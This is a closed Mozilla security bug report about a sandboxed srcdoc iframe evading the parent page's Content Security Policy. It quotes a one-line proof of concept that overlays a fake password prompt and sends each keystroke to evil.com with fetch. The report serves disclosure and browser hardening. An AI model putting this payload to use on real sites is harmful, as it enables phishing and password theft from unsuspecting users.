Closed Bug 1315952 Opened 8 years ago Closed 8 years ago

iframe sandbox with srcdoc bypasses inline script restriction from parent document CSP

Categories

(Core :: DOM: Security, defect)

Priority: Not set
Severity: normal


RESOLVED DUPLICATE of bug 1073952

People

(Reporter: freddy, Unassigned)

Details

(Keywords: sec-moderate)

Sent to me from Mario Heiderich (CCd):

> <iframe style='background:#F5F5F5;position:absolute;top:0;left:0;height:100%;width:100%;border:0' sandbox='allow-scripts' srcdoc='<h1>Please Enter Your Password</h1><input onkeyup=fetch("https://evil.com/?pass= "+this.value)>'>


This is only half a CSP bypass. The sandbox attribute is required to "lose" the outer document's CSP and thus execute scripts. But this also means that the srcdoc iframe cannot access the top level content. Still dangerous for phishing and such.
Group: core-security → dom-core-security
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Group: dom-core-security